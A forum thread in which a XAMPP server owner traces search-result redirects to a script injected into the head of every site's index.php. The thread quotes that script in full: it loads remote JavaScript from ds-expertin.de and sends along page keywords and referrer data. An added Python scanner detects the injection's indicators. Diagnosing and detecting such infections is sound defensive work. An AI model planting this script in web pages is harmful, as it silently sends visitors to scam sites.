HELP: Websites in my XAMPP server redirect to an online URL

Postby brduran » 21. February 2016 00:28

I've been running my XAMPP server on Windows 7 for years now and just noticed today a redirection:

1. I've done the following in Google, Bing, and Yahoo on more than 10 computers at different locations using IE11, Chrome, and Firefox, with very similar results:
Search query results for "teknician" and "banaguises" have a high chance of redirecting to "http://redirect.xmlheads.com/index.php" when you click on them
2. Both sites www.teknician.com and www.banaguises.com are on the same XAMPP server
3. Internal links on the websites like "http://www.teknician.com/index.php/remote" have a chance of redirecting as well
4. All I can think of is where to start looking for the infection?

Any help is greatly appreciated. Thank you!
brduran
 
Posts: 22
Joined: 13. June 2008 03:13

Re: HELP: Websites in my XAMPP server redirect to an online

Postby Nobbie » 22. February 2016 14:00

From readme_en.txt

A matter of security (A MUST READ!)

As mentioned before, XAMPP is not meant for production use but only for developers in a development environment. The way XAMPP is configured is to be open as possible and allowing the developer anything he/she wants. For development environments this is great but in a production environment it could be fatal.
Nobbie
 
Posts: 13182
Joined: 09. March 2008 13:04

Re: HELP: Websites in my XAMPP server redirect to an online

Postby brduran » 22. February 2016 16:50

The XAMPP server has been working great for more than 10 years. It's on a Windows 7 computer with RAID1 solid-state drives and I'm only running Apache and MySQL, but not as a service. For email I'm not using Mercury, which came with it, but hMailServer.

The server was connected directly to the modem for a decade until a couple of years ago, when my ISP warned me it had been used for spam. After closing all holes I moved the server behind a SonicWall TZ200; party is over. This redirect infection must've been there for a very long time, as I sincerely doubt any yoyo can get past a SonicWall.

At first I thought it was the Apache Server that had been compromised but when my head cooled off it came down to two options: ".htaccess" or "index.php"

The second was right: every single template in every single website on the server had the script below inserted between the <head> and </head> portion of the "index.php". That script would bring up the URL http://redirect.xmlheads.com/index.php in the web browser, which in turn would redirect to poorly designed, crappy websites, some of which would scare you by saying your computer was infected and to call a certain number in the USA... well, not anymore.

------------
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://ds-expertin.de/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://ds-expertin.de/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>
------------
brduran
 
Posts: 22
Joined: 13. June 2008 03:13
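
An added example, not part of the original posts: a scanner that walks a web root and flags template files carrying the markers of the injected script quoted above. The indicator strings are taken from that script; the host `injected.example`, the directory layout and the sample files are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the injected script quoted in the post above.
INDICATORS = {
    "fake jquery.min.php loader": re.compile(r"jquery\.min\.php\?", re.I),
    "tracking params (c_utt/c_utm)": re.compile(r"[?&]c_ut[tm]=", re.I),
    "se_referrer parameter": re.compile(r"se_referrer=", re.I),
    "document.write of remote <script>": re.compile(
        r"document\.write\(\s*['\"]<script[^>]*\bsrc=['\"]?https?://", re.I),
}
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}


def scan_text(text):
    """Return the sorted names of indicators found in one file's contents."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def scan_tree(root):
    """Walk root and map each suspicious file (relative path) to its hits."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def demo():
    """Scan a constructed two-site web root: site_a injected, site_b clean."""
    injected = ("<script>document.write('<script type=\"text/javascript\" src=\""
                "http://injected.example/js/jquery.min.php?c_utt=X&c_utm=Y"
                "&se_referrer='+document.referrer+'\"><'+'/script>');</script>")
    with tempfile.TemporaryDirectory() as tmp:
        for site, head in (("site_a", injected), ("site_b", "")):
            tpl = Path(tmp, site, "templates")
            tpl.mkdir(parents=True)
            (tpl / "index.php").write_text(
                f"<html><head>{head}<script src='/js/jquery.min.js'></script>"
                "</head><body></body></html>", encoding="utf-8")
        return scan_tree(tmp)


if __name__ == "__main__":
    print(demo())
```

Calling `scan_tree()` on the server's document root lists every file that still carries the injection; a file that is clean today but modified again later points to an entry path that has not been closed.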

Re: HELP: Websites in my XAMPP server redirect to an online

Postby Nobbie » 22. February 2016 22:59

brduran wrote: The XAMPP server has been working great for more than 10 years.


That does not change anything, it simply depends on your personal luck.

brduran wrote: The second was right, every single template in every single website on the server had the script below inserted <head> between </head> portion of the "index.php".


Due to the fact that your XAMPP server is not protected properly.
Nobbie
 
Posts: 13182
Joined: 09. March 2008 13:04

Re: HELP: Websites in my XAMPP server redirect to an online

Postby metro82 » 23. February 2016 00:02

i'll probably be of zero help here ... but i'm just wondering do you at the very least have a back-up of whatever was infected? (templates, etc...)?

this solution isn't for everyone ... but i always like to say "when in doubt" just do a complete reformat of your machine to be 100% sure that whatever got on your machine will be gone

probably would be very tedious and time consuming though as you'd need to reinstall everything from scratch again, and upload your server files & databases, etc...

but at the very least you can be assured that your system is 100% clean

try to have your machine properly protected if you do go for the reformat route ... because the issue you're having now would likely reappear again i'd assume ... and a reformat would do nothing

since this is not a xampp issue, i don't think you'll find much luck finding an answer to your issues

good luck nevertheless ... sorry i couldn't be more of help but was hoping to hear you at least had back-ups of everything
metro82
 
Posts: 5
Joined: 31. December 2015 18:03
Operating System: Windows 7 Home